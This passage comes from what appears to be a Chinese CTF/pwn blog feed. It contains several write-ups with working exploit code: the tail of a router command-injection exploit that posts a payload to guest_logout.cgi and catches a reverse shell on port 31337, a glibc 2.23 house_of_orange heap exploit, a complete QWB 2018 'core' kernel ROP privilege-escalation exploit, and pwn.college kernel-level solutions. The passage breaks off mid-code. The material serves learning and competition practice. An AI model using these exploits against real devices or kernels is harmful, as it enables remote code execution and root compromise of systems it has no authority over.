class="hljs-string">"status_guestnet.asp"</span> + cmd.ljust(0x55,<span class="hljs-string">'b'</span>).encode() + p32(system) <br><span class="hljs-comment">#payload=b"status_guestnet.asp" + b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'</span><br>data = {<span class="hljs-string">"cmac"</span>:<span class="hljs-string">"12:af:aa:bb:cc:dd"</span>, <span class="hljs-string">"submit_button"</span>:payload, <span class="hljs-string">"cip"</span>:<span class="hljs-string">"192.168.100.1"</span>}<br><br>def attack():<br> try:<br> requests.post(<span class="hljs-string">"http://192.168.182.21/guest_logout.cgi"</span>, <span class="hljs-attribute">data</span>=data, <span class="hljs-attribute">timeout</span>=1)<br> except Exception as e:<br> <span class="hljs-built_in">print</span>(e)<br><br>thread = Thread(<span class="hljs-attribute">target</span>=attack)<br>thread.start()<br><br>io = listen(31337)<br>io.wait_for_connection()<br>log.success(<span class="hljs-string">"getshell"</span>)<br>io.interactive()<br><br>thread.join()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>house_of_orange</title>
<link href="/2024/03/15/house-of-orange/"/>
<url>/2024/03/15/house-of-orange/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>关于orange前面topchunk构造出unsortedbin的利用手法早就已经学了,但是后面io的攻击始终没有接触,刚好最近在出题,于是学了一下</p><p>参考链接:</p><p><a href="https://blog.wjhwjhn.com/posts/house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">https://blog.wjhwjhn.com/posts/house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/</a></p><p><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/house-of-orange/">https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/house-of-orange/</a></p><p><a href="https://www.cnblogs.com/xshhc/p/17327672.html">https://www.cnblogs.com/xshhc/p/17327672.html</a></p><h1 id="题目特点"><a href="#题目特点" class="headerlink" title="题目特点"></a>题目特点</h1><p>1.一般libc版本是2.23</p><p>2.题目中并没有free函数</p><p>3.保护全开</p><p>4.堆溢出</p><h1 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h1><p>1.利用topchunk,构造出unsortedbin(即修改topchunk的size然后申请一个比topchunk.size更大的堆块)</p><p>2.泄露出libc和heap的地址</p><p>3.利用unsortedbin attack修改_IO_list_all的地址为main_arena+88</p><p>4.申请出smallbin同时在堆上伪造io(注意这3.4需要在一个步骤进行)</p><h1 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h1><p><strong>第一部分,利用topchunk来free</strong> 先来讲解第一部分,也就是利用topchunk来free从而得到堆地址和libc基址。 这个方法利用的就是当topchunk的size不足够申请的时候,malloc函数会重新申请一块区域作为topchunk,并且把当前的topchunk free掉到unsorted bin,所以我们就可以尝试修改topchunk的size,修改到不足够的大小,然后再申请一次比修改的topchunk的size要大的size</p><p>但是free的topchunk的size有一些要求(很多地方对这个介绍的很复杂,所以我想简单的来说)</p><ol><li>不要太小,比如小于0x10(MINSIZE)就不行了</li><li>topchunk的结束地址(当前地址 + size)要与页基址对齐,一般就是0x1000(结尾三个0)</li><li>prev_inuse = 1</li></ol><p>所以,当我们再次申请大于topchunk size的时候,就会进入unsorted bin,我们就可以leak libc了,并且可以同时泄露出堆地址</p><p><strong>第二步是利用<code>_IO_flush_all_lockp</code>进行攻击</strong> 这个函数我在ByteCTF 2019 note_five的那道题中也用到过,到了这里终于可以好好解释一下了。</p><p>什么时候会触发这个函数? 当系统发生abort的时候,会利用<code>_IO_flush_all_lockp</code>来看看各个fp指针中还有没有数据没有输出的,如果有,那么就会调用<code>_IO_OVERFLOW</code>。 <code>_IO_OVERFLOW</code>这个函数是调用当前fp指针的vtable中的+0x18地址。</p><p>这个函数做了什么? 
It takes the head pointer from <code>_IO_all_list</code> and follows <code>fp->_chain</code> to the next pointer until it reaches 0. So if we can control <code>_IO_list_all</code> and satisfy the conditions it requires, we can get a shell by forging the <code>_IO_OVERFLOW</code> slot (+0x18) of the vtable. From libc 2.24 on, a check on the vtable range was added, so the test environment here is libc 2.23 (Ubuntu 16.04).</p><p>How exactly do we build and exploit it? We have no way to write an address directly into <code>_IO_all_list</code> (obviously; if we could, we would just go for <code>__malloc_hook</code>), but with an unsorted bin attack we can write <code>main_arena + 88</code> into <code>_IO_all_list</code>. <code>_IO_flush_all_lockp</code> then treats that address as an fp pointer and checks whether the conditions on it hold; if they do, it executes <code>_IO_OVERFLOW</code>. Since the contents of <code>main_arena</code> are hard to control, we cannot get a shell by modifying that directly.</p><p>So we consider the case where the condition does not hold, i.e. the program does not raise another exception (the vtable value there is not under our control; if it is wrong, an exception may follow), and the program moves on to <code>fp->_chain</code> to find the next pointer. Debugging shows that <code>fp->_chain</code> lands exactly on smallbin[4], which holds chunks of size 0x60, so if we can set that slot to a controlled address we can forge the next fp pointer and get a shell.</p><p>How do we get a heap address written into smallbin[4]? When you malloc, the program checks whether the unsorted bin has a chunk of matching size; the unsorted chunk is taken out for inspection and, if the size does not fit, it is first placed into the small bin. So if we construct an unsorted bin chunk of size 0x60 and then free it, it goes into the smallbin, and the address written there is that chunk's address; with that chunk's contents laid out in advance, we get a shell.</p><p>What needs to be laid out on the heap? 
We need to lay out the following:</p><figure class="highlight c"><pre><code class="hljs c">  if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
       || (_IO_vtable_offset (fp) == 0
           && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                                > fp->_wide_data->_IO_write_base))
#endif
       )
      && _IO_OVERFLOW (fp, EOF) == EOF)
    result = EOF;
</code></pre></figure><p>We know that an if is evaluated from left to right, and if the earlier part fails the later part is not evaluated, so we can satisfy either of the following two: 1.<code>(fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)</code> 2.<code>(_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)</code></p><p>Write the vtable pointer to a controlled location and set <code>vtable+0x18</code> to the function we want to execute</p><p>Finally, the flow: after the setup, when the program reaches the fp at this position (provided the previous one did not error out; the probability is 1/2, because <code>fp->_mode</code> in main_arena is not under our control) and the condition holds, it executes <code>_IO_OVERFLOW</code> from the vtable, i.e. the function we substituted.</p>
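<p>As an added example that is not part of the original post, here is a stand-alone C model of the two glibc 2.23 checks the walkthrough above hinges on: the assertion sysmalloc runs on the old top chunk (the three size rules) and the flush condition in <code>_IO_flush_all_lockp</code>, including the walk along <code>fp->_chain</code>. The heap addresses, the chain contents and MINSIZE = 0x20 (the 64-bit glibc value) are constructed assumptions.</p>

```c
/* Added example, not code from the original post: a stand-alone model of the
 * two glibc 2.23 gatekeeping checks explained above, so the constraints on a
 * forged top chunk and a forged FILE can be tried without a target binary.
 * Constants are the x86-64 values (MINSIZE 0x20); the FILE model carries only
 * the fields the quoted if() reads. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define SIZE_BITS  0x7UL
#define PREV_INUSE 0x1UL
#define MINSIZE    0x20UL
#define PAGESIZE   0x1000UL

/* Mirrors the assert sysmalloc runs on the old top chunk (the three rules
 * above). top_addr is the address of the top chunk header, size_field its raw
 * size word with flag bits. */
bool old_top_is_acceptable(uintptr_t top_addr, uintptr_t size_field)
{
    uintptr_t old_size = size_field & ~SIZE_BITS;
    uintptr_t old_end  = top_addr + old_size;
    if (old_size < MINSIZE)          /* rule 1: not too small */
        return false;
    if (!(size_field & PREV_INUSE))  /* rule 3: prev_inuse must be set */
        return false;
    if (old_end & (PAGESIZE - 1))    /* rule 2: chunk end is page aligned */
        return false;
    return true;
}

/* _int_malloc serves a request from the top chunk while
 * top_size >= nb + MINSIZE; only a larger request reaches sysmalloc and frees
 * the old top into the unsorted bin. nb is the rounded chunk size (a 0x1000
 * request becomes 0x1010). The mmap threshold is ignored here. */
bool request_frees_old_top(uintptr_t size_field, uintptr_t nb)
{
    return (size_field & ~SIZE_BITS) < nb + MINSIZE;
}

/* Minimal stand-in for _IO_FILE. Pointers are kept as integers so forged
 * values such as 0 and 1 compare the way the real code compares them. */
struct wide_data { uintptr_t write_base, write_ptr; };
struct fake_file {
    uintptr_t         write_base;     /* fp->_IO_write_base */
    uintptr_t         write_ptr;      /* fp->_IO_write_ptr */
    struct wide_data *wide_data;      /* fp->_wide_data */
    int               mode;           /* fp->_mode */
    signed char       vtable_offset;  /* _IO_vtable_offset(fp) */
    struct fake_file *chain;          /* fp->_chain */
};

/* Left-hand side of the quoted if(): true means _IO_flush_all_lockp would go
 * on to call _IO_OVERFLOW(fp, EOF), i.e. the vtable+0x18 entry. The NULL guard
 * on wide_data only keeps the model from crashing; glibc has none. */
bool would_call_overflow(const struct fake_file *fp)
{
    bool narrow = fp->mode <= 0 && fp->write_ptr > fp->write_base;
    bool wide   = fp->vtable_offset == 0 && fp->mode > 0
                  && fp->wide_data != NULL
                  && fp->wide_data->write_ptr > fp->wide_data->write_base;
    return narrow || wide;
}

/* Walks the list from the _IO_list_all head through _chain and returns the
 * first fp that would be flushed, or NULL. */
const struct fake_file *first_flushable(const struct fake_file *head)
{
    for (const struct fake_file *fp = head; fp != NULL; fp = fp->chain)
        if (would_call_overflow(fp))
            return fp;
    return NULL;
}

/* Constructed list: an uncontrolled head standing in for main_arena+88
 * (write_ptr not above write_base, so it is skipped) chained, as smallbin[4]
 * would, to a forged FILE with write_base=0, write_ptr=1, mode=0, the values
 * the post's exp writes. Returns the index of the fp that would be flushed,
 * or -1 if none. */
int demo_chain(void)
{
    struct fake_file forged = { 0, 1, NULL, 0, 0, NULL };
    struct fake_file head   = { 0x10, 0x10, NULL, 0, 0, &forged };
    const struct fake_file *hit = first_flushable(&head);
    if (hit == &head)   return 0;
    if (hit == &forged) return 1;
    return -1;
}

int main(void)
{
    /* Constructed heap: base 0x555555757000 with a 0x40 chunk 0 in front, so
     * the top chunk header is at base+0x40; the post's exp writes 0xfc1. */
    uintptr_t top = 0x555555757040UL;
    printf("size 0xfc1 accepted: %d\n", old_top_is_acceptable(top, 0xfc1));
    printf("size 0xfc0 accepted: %d\n", old_top_is_acceptable(top, 0xfc0));
    printf("0x1000 request frees old top: %d\n", request_frees_old_top(0xfc1, 0x1010));
    printf("flushed fp index: %d\n", demo_chain());
    return 0;
}
```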
<p>Incidentally, when <code>_IO_OVERFLOW</code> is executed, the first argument passed is the address of this fp. So if we set the head of the forged fp to /bin/sh and forge the IO_overflow slot of the vtable as system, we get a shell. We can therefore set our controlled location, i.e. the fp address, to the content we want executed. Generally, directly modifying the head, i.e. the <code>_flags</code> field, is not ideal, but since _flags is not used at all here we can modify it directly. If <code>_flags</code> cannot be modified, write a ;sh; after it; because of the ; separators the parts before and after are treated as invalid commands, and sh still gets executed.</p><p>There is a way to complete all the steps above at once: write all the crafted data onto the heap in one go, then malloc once with a size that differs from the existing chunk's size. The execution then goes like this. 1. The unsorted bin attack runs, setting <code>BK->fd = main_arena + 88</code> 2. malloc finds that the size in the unsorted bin does not match the requested size, so it moves the unsorted chunk into the smallbin; which slot depends on the size, and the size built here is 0x60, so it goes into smallbin[4], which corresponds to <code>fp->_chain</code>. 3. Since the list has been corrupted, the subsequent check raises an error, which calls <code>_IO_flush_all_lockp</code>, which walks <code>_IO_list_all</code>; step 1 set <code>_IO_list_all</code> to <code>main_arena + 88</code>, so it checks whether that data meets the condition. If it does, the <code>IO_overflow</code> of that vtable is called; we never built that data, so another exception occurs and the shell fails (1/2). If it does not, it moves on to that fp's <code>fp->_chain</code>, which is exactly the smallbin[4] we forged; the fp pointer now points to our forged chunk, whose contents meet the condition, so the controlled vtable we forged is used to execute <code>_IO_OVERFLOW</code>, which we replaced with system, and since we set the head of this fp to <code>/bin/sh</code> it is passed as the argument, finally executing <code>system("/bin/sh")</code> and giving us a shell.</p><h1 id="例题:"><a href="#例题:" class="headerlink" title="例题:"></a>Example challenge:</h1><p>The challenge is one I wrote myself; I will publish it once it has been used.</p><p>exp:</p><figure class="highlight python"><pre><code class="hljs python">add(0,0x30)
# overflow from chunk 0 into the top chunk header: size 0xfc1 keeps prev_inuse set and the chunk end page aligned
edit(0,0x40,b'A'*0x30+p64(0)+p64(0xfc1))

# request more than the old top can serve: the old top is freed into the unsorted bin
add(1,0x1000)
add(2,0x400)
show(2)
libcbase=uu64()-0x3c5188
lg("libcbase")
io_list_all=libcbase+libc.sym['_IO_list_all']
system=libcbase+libc.sym['system']
fd=libcbase+0x3c4b78

# overwrite the fd pointer up to the bk field and read it back to leak a heap address
edit(2,0x10,b'A'*0xf+b'B')
show(2)
ru(b'B')
heapbase=u64(io.recvuntil(b'\n',drop=True).ljust(8,b'\x00'))-0x40
lg("heapbase")

vtable=heapbase+0x450
payload = b'a' * 0x400
# forged FILE: _flags holds "/bin/sh", size 0x61 sends the chunk to smallbin[4],
# bk = _IO_list_all-0x10 is the unsorted bin attack target
fake_file = b'/bin/sh\x00' + p64(0x61)
fake_file += p64(system) + p64(io_list_all - 0x10)
# _IO_write_base = 0, _IO_write_ptr = 1 satisfies write_ptr > write_base
fake_file += p64(0) + p64(1)
fake_file = fake_file.ljust(0xc0,b'\x00')
# _mode = 0 (offset 0xc0), then the vtable pointer whose +0x18 slot is system
fake_file += p64(0) * 3
fake_file += p64(vtable+0xf0-0x18)
fake_file += p64(0) * 2
fake_file += p64(system)
payload += fake_file
edit(2,len(payload),payload)
# a request of a different size sorts the chunk into smallbin[4] and triggers the abort
add(3,0x10)

ia()
</code></pre></figure>]]></content>
</entry>
<entry>
<title>kernel_rop</title>
<link href="/2024/03/04/kernel-rop/"/>
<url>/2024/03/04/kernel-rop/</url>
<content type="html"><![CDATA[<p>Reference article: <a href="https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/rop/rop/#_4">https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/rop/rop/#_4</a></p><p><strong>Kernel-mode ROP is essentially no different from user-mode ROP, except that the gadgets used are the kernel's gadgets, and the ropchain we need to build changes from</strong> <code>system("/bin/sh")</code> <strong>to</strong> <code>commit_creds(&init_cred)</code> or <code>commit_creds(prepare_kernel_cred(NULL))</code>. Once we have executed such code in the kernel, the current thread's cred struct becomes a copy of the init process's cred and we hold root privileges; starting a shell in user mode then gives a root shell.</p><h2 id="状态保存"><a href="#状态保存" class="headerlink" title="状态保存"></a>Saving state</h2><p>Normally our exploit needs to enter the kernel to escalate privileges, yet we ultimately still need to <strong>land back in user mode</strong> to obtain a root shell. So before the exploit enters kernel mode we must <strong>manually mimic the preparation the user-to-kernel transition performs</strong>, that is, <strong>save the register values on the kernel stack</strong>, so that we can later land back in user mode.</p><p>Normally the following function is used to save the register values into variables we define ourselves, for use when building the rop chain.</p><p>A general-purpose pwn template.</p><p>When compiling, pass the flag <code>-masm=intel</code>.</p><figure class="highlight c"><pre><code class="hljs c">#include <stdio.h>

size_t user_cs, user_ss, user_rflags, user_sp;
void saveStatus()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}
</code></pre></figure><h2 id="返回用户态"><a href="#返回用户态" class="headerlink" title="返回用户态"></a>Returning to user mode</h2><p>Returning from kernel mode to user mode requires only:</p><ul><li><code>swapgs</code> to restore the user-mode GS register</li><li><code>sysretq</code> or <code>iretq</code> to return to user space</li></ul><p>So we just need to find the corresponding gadgets in the kernel and execute <code>swapgs;iretq</code> to land back in user mode.</p><p>Generally, we build the following rop chain to return to user mode and obtain a shell:</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">swapgs
iretq
user_shell_addr
user_cs
user_eflags // 64bit user_rflags
user_sp
user_ss
</code></pre></figure><h2 id="例题:强网杯-2018-core"><a href="#例题:强网杯-2018-core" class="headerlink" title="例题:强网杯 2018 - core"></a>Example: Qiangwang Cup (QWB) 2018 - core</h2><h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>Analysis</h3><p>The challenge provides four files: bzImage, core.cpio, start.sh and a vmlinux with a symbol table.</p><p>We already know the purpose of the first three; vmlinux is the statically linked, uncompressed kernel, and bzImage can be understood as its compressed form. For more detail see <a href="https://unix.stackexchange.com/questions/5518/what-is-the-difference-between-the-following-kernel-makefile-terms-vmlinux-vml">stackexchange</a></p><p>Since vmlinux is not compressed, we can find gadgets in it; let us save the gadgets first for later use. </p><p>I recommend ropper for searching, which is more convenient, or use ROPgadget to dump all gadgets into a text file.</p><p> Look at start.sh: </p><figure class="highlight bash"><pre><code class="hljs bash">qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
</code></pre></figure><p>The kernel has kaslr enabled.</p><p>After unpacking core.cpio, look at init (the script shown here is one I have already modified):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs bash">#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2 
insmod /core.ko

#poweroff -d 120 -f &
#setsid /bin/cttyhack setuidgid 1000 /bin/sh
setsid /bin/cttyhack setuidgid 0 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys
</code></pre></td></tr></table></figure><ul><li>Line 9 saves the contents of kallsyms to /tmp/kallsyms, so we can read the addresses of commit_creds and prepare_kernel_cred from /tmp/kallsyms</li><li>Line 10 sets kptr_restrict to 1, so function addresses can no longer be viewed through /proc/kallsyms, but line 9 already saved that information to a readable file, so this line is moot</li><li>Line 11 sets dmesg_restrict to 1, so kernel messages can no longer be viewed with dmesg</li><li>Line 18 sets a timed shutdown; to avoid interference while solving, delete that line and repack</li></ul><p>There is also a shell script, gen_cpio.sh, which mainly makes repacking convenient</p><p>To run the kernel here, the 64 in start.sh has to be changed to 128, because the memory given to the kernel needs to be increased; since I have already changed many things, I will just paste the wiki's steps:</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">core [master●●] vim init 
core [master●●] rm core.cpio 
core [master●●] ./gen_cpio.sh core.cpio
.
./usr
./usr/sbin
./usr/sbin/popmaildir
......
......
./core.cpio
./core.ko
129851 块
core [master●●] ls
bin core.ko gen_cpio.sh lib linuxrc root sys usr
core.cpio etc init lib64 proc sbin tmp vmlinux
core [master●●] mv core.cpio ..
core [master●●] cd ..
give_to_player [master●●] ./start.sh 
</code></pre></figure><p>Next, analyze core.ko</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403042204484.png" alt="image-20240304220457326"></p><p>Opening it in IDA, there is an obvious stack overflow in core_copy_func: the length check is a signed comparison, but the copy truncates the length to an unsigned 16-bit value</p><figure class="highlight c"><pre><code class="hljs c">__int64 __fastcall core_copy_func(__int64 a1)
{
  __int64 result; // rax
  _QWORD v2[10]; // [rsp+0h] [rbp-50h] BYREF

  v2[8] = __readgsqword(0x28u);
  printk(&unk_215);
  if ( a1 > 63 )
  {
    printk(&unk_2A1);
    return 0xFFFFFFFFLL;
  }
  else
  {
    result = 0LL;
    qmemcpy(v2, &name, (unsigned __int16)a1);
  }
  return result;
}
</code></pre></figure><p>The analysis of the other functions can be found in the wiki, which explains them clearly</p><p>Approach:</p><ol><li>Set off through ioctl, then leak the canary through core_read()</li><li>Write to name through core_write() to build the ropchain</li><li>Copy from name onto the local variable through core_copy_func(); with a suitable length and the canary, perform the rop</li><li>Execute commit_creds(prepare_kernel_cred(0)) through the rop</li><li>Return to user mode and start a shell with system("/bin/sh") or similar</li></ol><p>exp:</p><figure class="highlight c"><pre><code class="hljs c">// gcc exp.c -static -masm=intel -g -o exp
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

void spawn_shell()
{
    system("/bin/sh");
}

size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t vmlinux_base = 0;
// parse /tmp/kallsyms (saved by init before kptr_restrict was set) for the two symbols
size_t find_symbols()
{
    FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");

    if(kallsyms_fd == NULL)   // fopen returns a FILE*, so test for NULL rather than < 0
    {
        puts("[*]open kallsyms error!");
        exit(0);
    }

    char buf[0x30] = {0};
    while(fgets(buf, 0x30, kallsyms_fd))
    {
        if(commit_creds && prepare_kernel_cred)
            return 0;
        printf("%s",buf);
        if(strstr(buf, "commit_creds") && !commit_creds)
        {
            /* puts(buf); */
            char hex[20] = {0};
            strncpy(hex, buf, 16);   // the address is the first 16 hex digits of the line
            sscanf(hex, "%lx", &commit_creds);
            printf("commit_creds addr: %#lx\n", commit_creds);
            vmlinux_base = commit_creds - 0x9c8e0;   // offset of commit_creds in this vmlinux
            printf("vmlinux_base addr: %#lx\n", vmlinux_base);
        }

        if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
        {
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            sscanf(hex, "%lx", &prepare_kernel_cred);
            printf("prepare_kernel_cred addr: %#lx\n", prepare_kernel_cred);
        }
    }

    if(!(prepare_kernel_cred && commit_creds))
    {
        puts("[*]Error!");
        exit(0);
    }
    return 0;
}

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*]status has been saved");
}

void set_off(int fd, long long idx)
{
    printf("[*]set off to %lld\n", idx);
    ioctl(fd, 0x6677889C, idx);
}

void core_read(int fd, char *buf)
{
    puts("[*]read to buf.");
    ioctl(fd, 0x6677889B, buf);
}

void core_copy_func(int fd, long long size)
{
    printf("[*]copy from user with size: %lld\n", size);
    ioctl(fd, 0x6677889A, size);
}

int main()
{
    save_status();
    int fd = open("/proc/core", O_RDWR);
    if (fd < 0) 
    {
        puts("[*]open /proc/core error!");
        exit(0);
    }

    find_symbols();
    ssize_t offset = vmlinux_base - raw_vmlinux_base;   // KASLR slide

    set_off(fd, 0x40);
    char buf[0x40] = {0};
    core_read(fd, buf);
    size_t canary = ((size_t *)buf)[0];
    printf("[+]canary: %#lx\n", canary);

    size_t rop[0x1000] = {0};
    int i;
    for(i = 0; i < 10; i++)   // fill up to and including the canary slot and saved rbp
    {
        rop[i] = canary;
    }

    rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret
    rop[i++] = 0;
    rop[i++] = prepare_kernel_cred; // prepare_kernel_cred(0)

    rop[i++] = 0xffffffff810a0f49 + offset; // pop rdx; ret
    rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret
    rop[i++] = 0xffffffff8101aa6a + offset; // mov rdi, rax; call rdx; 
    rop[i++] = commit_creds;

    rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
    rop[i++] = 0;

    rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret; 

    rop[i++] = (size_t)spawn_shell; // rip

    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;

    write(fd, rop, 0x800);
    // negative as a signed value, so a1 > 63 is false; 0x100 after the unsigned 16-bit truncation
    core_copy_func(fd, 0xffffffffffff0000 | (0x100));
    return 0;
}
</code></pre></figure>]]></content>
</entry>
<entry>
<title>Learning the kernel through pwn.college</title>
<link href="/2024/01/22/%E9%80%9A%E8%BF%87pwncollege%E5%AD%A6%E4%B9%A0kernel/"/>
<url>/2024/01/22/%E9%80%9A%E8%BF%87pwncollege%E5%AD%A6%E4%B9%A0kernel/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h1>
<p>Challenge link: <a href="https://pwn.college/system-security/kernel-security">https://pwn.college/system-security/kernel-security</a></p>
<p>The first few challenges are fairly simple; as a warm-up for getting familiar with the kernel, I think they are just right.</p>
<p>pwn.college challenges, however, have to be solved inside the platform's own virtual machine, which can be very laggy for reverse engineering. You can instead download the challenges from their GitHub, reverse them on your own machine, and then go back into their VM to solve them.</p>
<p>GitHub link: <a href="https://github.com/pwncollege/system-security-dojo/tree/main/kernel-security">https://github.com/pwncollege/system-security-dojo/tree/main/kernel-security</a></p>
<h1 id="level1-0"><a href="#level1-0" class="headerlink" title="level1.0"></a>level1.0</h1>
<p>First look at the init function: it reads the flag into the <code>flag</code> variable and uses <code>proc_create</code> to create the virtual <code>proc</code> file <code>pwncollege</code>, which appears at <code>/proc/pwncollege</code>.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401221924338.png" alt="image-20240122192443149"></p>
<p>Now the read function:</p>
<p>If <code>device_state</code> is 2, it copies the <code>flag</code> variable into the user-supplied <code>buffer</code>.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401222021304.png" alt="image-20240122202108207"></p>
<p>Next the write function:</p>
<p>If the password written is <code>snceewqvyntlwfha</code>, <code>device_state</code> is set to 2.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401221927496.png" alt="image-20240122192741408"></p>
<p>Following the analysis above: <code>open</code> <code>/proc/pwncollege</code>, use <code>write</code> to set <code>device_state</code> to 2, use <code>read</code> to copy the flag into a user-space variable, and then print the flag.</p>
<p>exp:</p>
<figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
    char buffer[100] = {0};
    int fd = open("/proc/pwncollege", O_RDWR);
    if (fd < 0) {
        perror("open /proc/pwncollege");
        return 1;
    }
    char key[] = "gkklnaumhysmwksq";
    write(fd, key, sizeof(key));          // correct password sets device_state to 2
    read(fd, buffer, sizeof(buffer) - 1); // read handler now copies the flag out
    printf("%s\n", buffer);
    return 0;
}
</code></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401222028507.png" alt="image-20240122202819386"></p>
<h1 id="level1-1"><a href="#level1-1" class="headerlink" title="level1.1"></a>level1.1</h1>
<p>Almost identical to the previous level; it just adds a little more reversing to the challenge and changes the password.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
    char buffer[100] = {0};
    int fd = open("/proc/pwncollege", O_RDWR);
    if (fd < 0) {
        perror("open /proc/pwncollege");
        return 1;
    }
    char key[] = "bbhlnbpoisiduufx";
    write(fd, key, sizeof(key));          // correct password sets device_state to 2
    read(fd, buffer, sizeof(buffer) - 1); // read handler now copies the flag out
    printf("%s\n", buffer);
    return 0;
}
</code></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401222127874.png" alt="image-20240122212756743"></p>
<h1 id="level2-0"><a href="#level2-0" class="headerlink" title="level2.0"></a>level2.0</h1>
<p>Apart from a small change to the write function, the other functions are essentially unchanged.</p>
<p>As the figure below shows, we only need to pass in the password and the flag is printed directly.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232140156.png" alt="image-20240123214010029"></p>
<p>exp:</p>
<figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
    int fd = open("/proc/pwncollege", O_RDWR);
    if (fd < 0) {
        perror("open /proc/pwncollege");
        return 1;
    }
    char key[] = "exziykkjtlbpfcbn";
    write(fd, key, sizeof(key)); // the write handler prints the flag with printk; read it from dmesg
    return 0;
}
</code></pre></td></tr></table></figure>
<p>Note that messages printed inside the kernel are not returned to the user directly; you have to use the <code>dmesg</code> command to view the kernel log before you can see the flag.</p>
<h1 id="level3-0"><a href="#level3-0" class="headerlink" title="level3.0"></a>level3.0</h1>
<p>Again you just write the password, but the flag is no longer printed. The program provides a <code>win</code> function which, once executed, changes the process's privileges to root.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232218796.png" alt="image-20240123221856720"></p>
<figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    int fd = open("/proc/pwncollege", O_RDWR);
